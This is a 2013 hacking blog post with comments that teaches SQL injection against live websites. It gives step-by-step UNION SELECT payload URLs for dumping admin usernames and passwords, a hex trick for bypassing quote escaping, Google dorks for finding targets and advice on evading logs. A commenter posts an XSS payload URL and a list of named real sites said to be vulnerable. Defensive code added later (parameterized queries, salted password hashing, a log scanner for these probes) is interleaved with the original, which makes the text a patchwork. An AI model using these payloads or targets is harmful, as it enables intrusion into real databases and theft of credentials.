Thursday, 17 January 2013

SQL Injection


If you are crazy about hacking, here I'm going to tell you about one of the simplest hacking procedures, called SQL injection.
SQL injection is a technique in which malicious input is supplied to a web application so that the attacker gains access to the host's database; it works whenever the site passes that input straight into its database operations.

"SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks".

So what do you need to do?

You need to find vulnerable sites manually by using some Google Dorks.


Checking for vulnerability:



Step 1:
 In order to check whether a site is vulnerable to SQL injection, just put a ' at the end of the URL, like this:

http://www.examplesite.com/index.php?id=5'

If the site shows you a database error, it is vulnerable to SQL injection. Let's say we found a vulnerable site.

You may get something like this on the web page:

Warning: mssql_execute(): message: Error converting data type varchar to int. (severity 16) in /var/www/html/includes/dbconnect.class.php on line 59

In order to successfully extract information from the database we need to do a few things, so it might be a good idea to open a text document so you can write things down.



Step 2:
 First we need to find out how many columns the page's query returns (the UNION in the next step has to supply exactly that many). To do so we use this query, by trial and error:

http://www.examplesite.com/index.php?id=5 order by 1--

Keep increasing the number until you get an error.

http://www.examplesite.com/index.php?id=5 order by 5--
http://www.examplesite.com/index.php?id=5 order by 10--
Let's say there are 10 columns.



Step 3:
 Now we need to find out which of those columns are actually displayed on the page, because those are the ones we can read data back through. To do so we use this query:

http://www.examplesite.com/index.php?id=-5 union select 1,2,3,4,5,6,7,8,9,10--

Notice that I have put a minus sign in front of the id number (id=-5).
Since there is no page with id -5, the site's normal content is cleared, which makes it easier to spot the data we are looking for.
Okay, let's say the numbers 3, 6 and 9 popped up on the site; those are the displayed columns.



Step 4:
 Now we want to find the version of the database. To do so we use this query, in any one of the displayed columns (I chose 3 for this example):

http://www.examplesite.com/index.php?id=-5 union select 1,2,@@version,4,5,6,7,8,9,10--
And if that doesn't work, try this one:
http://www.examplesite.com/index.php?id=-5 union select 1,2,version(),4,5,6,7,8,9,10--





Step 5:
 Now we want the name of the database for later use. To do so we use this query:

http://www.examplesite.com/index.php?id=-5 union select 1,2,concat(database()),4,5,6,7,8,9,10--

Write that name down so you won't forget it. Let's say the database name I just extracted was exampledatabase.
If the version is 4 or below, it is probably best to move on to another site, since you would have to brute-force the table names (which isn't a very good idea for starters like us).



Step 6:
 If the version is 5 or above, we use this query to show all the tables:

http://www.examplesite.com/index.php?id=-5 union select 1,2,group_concat(table_name),4,5,6,7,8,9,10 from information_schema.tables where table_schema=database()--


You don't have to group-concatenate the output here; these queries would work as well:

http://www.examplesite.com/index.php?id=-5 union select 1,2,concat(table_name),4,5,6,7,8,9,10 from information_schema.tables where table_schema=database()--
http://www.examplesite.com/index.php?id=-5 union select 1,2,table_name,4,5,6,7,8,9,10 from information_schema.tables where table_schema=database()--
Now you have the table names!


Now look at those tables and see if you can spot tables that we know usually hold good information, such as:
User(s)
Admin(s)
tbluser(s) / tbl_user(s)
tbladmin(s) / tbl_admin(s)
Of course the admin might not have given the table such an obvious name, so you might have to look around.




Step 7:
 Once you have found the table you think has the information you want, we use this query (in this example I use admin):

http://www.examplesite.com/index.php?id=-5 union select 1,2,column_name,4,5,6,7,8,9,10 from information_schema.columns where table_name="admin"--

If the site shows you an error now, don't panic! All that means is that Magic Quotes is turned on (the quotes around admin are being escaped). To bypass this we need to write the text "admin" in hex.

To do this:
Copy the name of the table you are trying to access, visit a text-to-hex website, paste the name where it says "Say Hello To My Little Friend", click Convert, and copy the hex into your query like this:

http://www.examplesite.com/index.php?id=-5 union select 1,2,column_name,4,5,6,7,8,9,10 from information_schema.columns where table_name=0x61646d696e--

Notice the 0x before the hex string; it tells the server that what follows is a hex string.
You should now see all the columns inside the table.



Step 8:
 Now, once again, you have to spot the columns whose contents we want to see (although it is hopefully easier this time).
Let's say there are two columns called username and password. To see what is inside those columns we use this query:

http://www.examplesite.com/index.php?id=-5 union select 1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10 from exampledatabase.admin--

This is where we needed the database name. By the way, 0x3a means a colon (:).

Now you have the admin login!
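The whole procedure above works because the page pastes the raw id value into its SQL text. The following is an added example, not code from the original post: it uses Python's built-in sqlite3 with a constructed two-table database (an articles table that index.php?id=... reads, and the admin table the tutorial dumps), so the UNION has two columns instead of the ten above. It shows the vulnerable pattern reacting exactly as Steps 1, 2 and 8 describe, and a hardened version that rejects every one of those inputs. The function names, table contents and the password hash value are my own.

```python
import sqlite3

# Constructed stand-in for "exampledatabase": a content table read by index.php?id=...
# and the admin table the tutorial ends up dumping.  Values are made up for the example.
ADMIN_PASSWORD_HASH = "e10adc3949ba59abbe56e057f20f883e"   # md5("123456"), constructed


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.execute("INSERT INTO articles VALUES (5, 'Hello', 'Welcome to the site')")
    conn.execute("CREATE TABLE admin (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO admin VALUES (1, 'admin', ?)", (ADMIN_PASSWORD_HASH,))
    conn.commit()
    return conn


def vulnerable_lookup(conn, id_param):
    """The pattern the tutorial depends on: the raw query-string value is pasted
    into the SQL text, so a stray quote, ORDER BY n and UNION SELECT all reach
    the database exactly as typed into the address bar."""
    sql = "SELECT title, body FROM articles WHERE id=" + id_param
    return conn.execute(sql).fetchall()


def hardened_lookup(conn, id_param):
    """Two independent layers.  Strong typing: anything that is not an integer is
    rejected before any SQL exists (None here; a real handler answers 400).
    Parameter binding: the value travels as data, never as SQL text, so even a
    string id could not alter the statement."""
    try:
        article_id = int(id_param)
    except ValueError:
        return None
    return conn.execute(
        "SELECT title, body FROM articles WHERE id=?", (article_id,)
    ).fetchall()


def raises_db_error(lookup, conn, id_param):
    """True if the input makes the lookup fail with a database error.  That error
    is the Step 1 symptom and the Step 2 column-count oracle; the hardened
    handler never produces one."""
    try:
        lookup(conn, id_param)
    except sqlite3.Error:
        return True
    return False


if __name__ == "__main__":
    db = build_db()
    for probe in ("5", "5'", "5 order by 3--",
                  "-5 union select username,password from admin--"):
        print(repr(probe), "vulnerable:",
              "error" if raises_db_error(vulnerable_lookup, db, probe)
              else vulnerable_lookup(db, probe),
              "| hardened:", hardened_lookup(db, probe))
```

With binding in place the value is never parsed as SQL, so the Step 7 hex trick and the Magic Quotes escaping it works around are both beside the point; for parameters that genuinely are strings, the bound parameter alone is the fix, and the integer cast is simply a cheap extra check for numeric ids.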

If it is encrypted, try to run it through some online MD5 'decrypters' or use my free cracked
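Why those online MD5 'decrypters' work, and what the site should have stored instead, as an added example that is not part of the original post: an unsalted MD5 of a common password is not reversed, it is simply matched against a table of precomputed hashes, whereas a salted, iterated hash (PBKDF2-HMAC-SHA256 from Python's standard library) gives every user a different value and makes each guess expensive. The three-word wordlist and the helper names are mine.

```python
import hashlib
import hmac
import os

# Constructed mini wordlist; a real lookup service holds billions of entries.
COMMON_PASSWORDS = ["123456", "password", "admin"]


def md5_hex(password):
    """Unsalted MD5, the way many sites of that era stored passwords."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def lookup_md5(digest):
    """What an online 'decrypter' really does: no reversal, just a match against
    precomputed hashes of common passwords.  Returns the password or None."""
    table = {md5_hex(p): p for p in COMMON_PASSWORDS}
    return table.get(digest.lower())


def hash_password(password, iterations=600_000, salt=None):
    """Salted, iterated hash.  Stored form: pbkdf2_sha256$iterations$salt_hex$dk_hex.
    A fresh random salt per user defeats precomputed tables; the iteration count
    makes each guess slow."""
    if salt is None:
        salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), dk.hex())


def verify_password(password, stored):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    try:
        algo, iterations, salt_hex, dk_hex = stored.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    leaked = md5_hex("123456")
    print("leaked md5:", leaked, "->", lookup_md5(leaked))
    stored = hash_password("123456")
    print("stored:", stored)
    print("verify correct:", verify_password("123456", stored),
          "verify wrong:", verify_password("letmein", stored))
```

Two hashes of the same password come out different because of the salt, so a dump like the one in Step 8 cannot be resolved with a single lookup table; the attacker has to guess per user, at the cost the iteration count imposes.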


And now we have to find the admin login page; to do so, once again, you can use
Google Dorks to search for it manually.

example :

inurl:adminlogin.php
inurl:admin.aspx
etc.


Now check out the administrator login and enjoy the hack trip!

In the end:
   Feel lazy typing each and every SQL query into the address bar?
    Don't worry, you too can enjoy this hack trip: just use Havij or SQL Poizon, the GUI hack tools for you lazy guys!

This is not the end. Here I'm providing a link to a list of rich Google Dorks, personally tested by me, which you can use for XSS and for SQL injection.
Some popular Dorks:

inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=d=
For some more, download Google_Droks.rtf

But be aware of the websites' log files, as they always track your actions, and I'm not responsible in case you get into trouble. This is just a game; always maintain anonymity on the Web.
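The remark about log files is the defender's side of this whole tutorial: every step above leaves a distinctive request line in the web server's access log. The following is an added example, not part of the original post, that scans constructed Apache-style log lines for exactly those probes (the stray quote, order by, union select, information_schema, @@version and 0x hex literals), decodes any hex literal so an analyst can see which table name was asked for, and tallies hits per source address. The log lines, addresses and function names are constructed for the example.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed Apache common-log lines replaying the tutorial's probes from one
# address, plus one ordinary visitor.  Not real traffic; addresses are RFC 5737 test ranges.
LOG_LINES = """\
203.0.113.7 - - [17/Jan/2013:10:01:02 +0000] "GET /index.php?id=5 HTTP/1.1" 200 5123
203.0.113.7 - - [17/Jan/2013:10:01:09 +0000] "GET /index.php?id=5%27 HTTP/1.1" 500 412
203.0.113.7 - - [17/Jan/2013:10:01:15 +0000] "GET /index.php?id=5%20order%20by%2010-- HTTP/1.1" 500 412
203.0.113.7 - - [17/Jan/2013:10:02:40 +0000] "GET /index.php?id=-5%20union%20select%201,2,@@version,4,5,6,7,8,9,10-- HTTP/1.1" 200 4872
203.0.113.7 - - [17/Jan/2013:10:03:01 +0000] "GET /index.php?id=-5%20union%20select%201,2,column_name,4,5,6,7,8,9,10%20from%20information_schema.columns%20where%20table_name=0x61646d696e-- HTTP/1.1" 200 4901
198.51.100.23 - - [17/Jan/2013:10:05:55 +0000] "GET /gallery.php?id=12&page=2 HTTP/1.1" 200 7710
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+'
)

# Each signature is applied to one URL-decoded parameter value, in this order.
SIGNATURES = [
    ("stray-quote", re.compile(r"^\d+'$")),
    ("order-by-probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union-select", re.compile(r"\bunion\b.*\bselect\b", re.I)),
    ("information-schema", re.compile(r"\binformation_schema\b", re.I)),
    ("version-fingerprint", re.compile(r"@@version|\bversion\s*\(", re.I)),
    ("hex-literal", re.compile(r"\b0x[0-9a-f]+\b", re.I)),
    ("sql-comment", re.compile(r"--|/\*")),
]
HEX_RE = re.compile(r"\b0x([0-9a-f]+)\b", re.I)


def decode_hex_literals(value):
    """Turn 0x61646d696e-style literals back into text ('admin') for the analyst."""
    out = []
    for h in HEX_RE.findall(value):
        if len(h) % 2 == 0:
            out.append(bytes.fromhex(h).decode("utf-8", "replace"))
    return out


def scan_access_log(text):
    """Return one finding per suspicious parameter value, in log order."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            reasons = [label for label, rx in SIGNATURES if rx.search(value)]
            if reasons:
                findings.append({
                    "ip": m.group("ip"),
                    "status": int(m.group("status")),
                    "param": name,
                    "value": value,
                    "reasons": reasons,
                    "hex_decoded": decode_hex_literals(value),
                })
    return findings


def suspicious_sources(findings):
    """Hits per source address; a run of hits from one address is the pattern to escalate."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    hits = scan_access_log(LOG_LINES)
    for f in hits:
        print(f["ip"], f["status"], f["param"], "=", f["value"], f["reasons"], f["hex_decoded"])
    print(suspicious_sources(hits))
```

The HTTP status is kept in each finding on purpose: the 500 responses to the quote and order by probes are the same database errors the tutorial tells the reader to look for, so a 500 followed by 200s with union select from one address is the signature of the full walkthrough. Treat single hits as triage input rather than grounds for blocking, since words like "order" or "union" can occur in legitimate free-text parameters.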

"Never make use of someones weakness.., be a cyber warrior by helping in resolving the Vulnerability..."


4 comments:

  1. Being a grey hat hacker I like it..., continue your work as it helps the beginners...!
    I suggest you to write about XSS attacks in your next post.., refer my new experiment here
    http://www.gamakatsu.com/search.php?q=%3CIMG%20SRC=%22http://4.bp.blogspot.com/_ycMde43Wqe0/TPwAAuG3KKI/AAAAAAAACZA/q_skTl7RBrw/s1600/hr_The_Walking_Dead.jpg%22%3E

    ReplyDelete
    Replies
    1. Well..., thanks for that. :)
      I need to state that I'm not a hacker, I'm just an individual who loves internet technology.
      And I also want to say that I share what I know, and I'll keep doing it.
      Finally, I think you are just a newborn & not a grey hat...!

      Delete
  2. This is really cool, I love SQL Injection...!
    Hi dude Sriharsha CR, tell us some more hacking tricks & what's next after SQL injection...? XSS or something else...? Waiting for a new posting...!

    ReplyDelete
  3. Latest SQL Vulnerable sites 05 SEPT 2014:

    http://www.irishsanghatrust.ie/news.php?id=33'
    http://www.calidus.ro/en/news.php?id=2'
    http://www.police.gov.bd/content.php?id=275'
    http://www.cobranet.org/about.php?id=1'
    http://www.karnaticlabrecords.com/cart.php?id=88'
    http://www.retromoderndesign.com/sold.php?id=9'

    ReplyDelete
